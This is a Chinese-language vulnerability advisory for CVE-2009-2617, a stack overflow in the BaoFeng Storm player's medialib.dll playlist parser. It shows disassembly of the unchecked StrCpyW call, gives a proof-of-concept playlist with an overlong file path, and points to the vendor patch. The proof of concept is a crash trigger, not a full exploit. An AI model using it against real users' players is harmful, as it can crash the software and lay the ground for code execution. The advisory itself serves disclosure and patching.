发布日期：2009-06-26
更新日期：2009-06-29

受影响系统：

BaoFeng 暴风影音 3.9.62

不受影响系统：

BaoFeng 暴风影音 3.09.06.25

描述：

---

BUGTRAQ  ID: 35512
CVE(CAN) ID: CVE-2009-2617

暴风影音是在中国非常流行的万能多媒体播放软件。

暴风影音的medialib.dll库在处理smpl播放列表文件时存在栈溢出漏洞，用户受骗打开了包含有超长路径的播放列表文件就会触发这个溢出，导致执行任意指令。

.text:1000567B ; int __stdcall sub_1000567B(LPCWSTR pszUrl,DWORD pcchPath)
.text:1000567B sub_1000567B    proc near               ; DATA XREF: .rdata:100248D4 o
.text:1000567B
.text:1000567B FileName        = word ptr -628h
.text:1000567B var_10          = dword ptr -10h
.text:1000567B var_C           = dword ptr -0Ch
.text:1000567B var_4           = dword ptr -4
.text:1000567B pszUrl          = dword ptr  8
.text:1000567B pcchPath        = dword ptr  0Ch
.text:1000567B
.text:1000567B                 mov     eax, offset sub_100221F8
.text:10005680                 call    __EH_prolog
.text:10005685                 sub     esp, 61Ch
.text:1000568B                 push    ebx
.text:1000568C                 push    esi
.text:1000568D                 mov     esi, [ebp+pszUrl]
.text:10005690                 mov     [ebp+var_10], ecx
.text:10005693                 test    esi, esi
.text:10005695                 jz      loc_1000577D
.text:1000569B                 mov     ebx, [ebp+pcchPath]
.text:1000569E                 test    ebx, ebx
.text:100056A0                 jz      loc_1000577D
.text:100056A6                 push    edi
.text:100056A7                 push    esi             ; pszPath
.text:100056A8                 xor     edi, edi
.text:100056AA                 mov     [ebp+pcchPath], 208h
.text:100056B1                 call    ds:PathIsURLW
.text:100056B7                 test    eax, eax
.text:100056B9                 jz      short loc_100056E0
.text:100056BB                 push    3               ; UrlIs
.text:100056BD                 push    esi             ; pszUrl
.text:100056BE                 call    ds:UrlIsW
.text:100056C4                 test    eax, eax
.text:100056C6                 jz      short loc_100056E0
.text:100056E0 loc_100056E0:                           ; CODE XREF: sub_1000567B+3E j
.text:100056E0                                         ; sub_1000567B+4B j
.text:100056E0                 lea     eax, [ebp+FileName]
.text:100056E6                 push    esi
.text:100056E7                 push    eax
.text:100056E8                 call    ds:StrCpyW   <---------------------strcpy directly with out any examiation.

<*来源：Jambalaya
  
  链接：http://securityreason.com/achievement_securityalert/63
        http://secunia.com/advisories/35592/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<playlist><item name="2.GIF" source="C:\Documents and Settings\Linlin\桌面\2.GIF" duration="0"/><item name="0001.gif" source="C:\Documents and Settings\Linlin\桌面\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif" duration="0"/></playlist>

建议：

---

厂商补丁：

BaoFeng
-------
目前厂商已经在最新版本的软件中修复了这个安全问题，请到厂商的网站下载：

http://www.baofeng.com/

浏览次数：2790
严重程度：0（网友投票）